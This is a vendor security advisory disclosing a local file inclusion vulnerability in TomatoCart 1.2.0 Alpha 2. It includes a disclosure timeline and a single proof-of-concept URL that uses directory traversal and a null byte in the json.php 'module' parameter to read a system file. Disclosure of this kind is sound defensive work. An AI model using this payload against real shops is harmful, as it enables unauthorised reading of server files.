InLocal File Inclusion in TomatoCart Discovered with Invicti

Information

Advisory by Netsparker (now Invicti)
Name: Local File Inclusion Vulnerability in TomatoCart
Software: TomatoCart 1.2.0 Alpha 2 and possibly below.
Vendor Homepage: https://sourceforge.net/projects/tomatocart/
Vulnerability Type: Local File Inclusion
Severity: Critical
Researcher: Canberk Bolat
Advisory Reference: NS-12-004

Description

TomatoCart is a professional and innovative open-source eCommerce solution. The back-end is an impressive desktop-like ExtJS-powered interface, offering significant usability improvements and user experience. It’s the most easy-to-use shopping cart.

Details

TomatoCart is affected by a Local File Inclusion vulnerability in version 1.2.0 Alpha 2.
Example PoC url is as follows:

http://example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00

You can read the full article about Local File Inclusion vulnerability from here:

Solution

No patch was released.

Advisory Timeline

30/09/2011 – First contact: No response
26/12/2011 – Second contact: No response
28/03/2012 – Vulnerability Released

Credits

It has been discovered on testing of Invicti.

References

  1. Invicti Advisories : /web-applications-advisories/

About Invicti

IInvicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.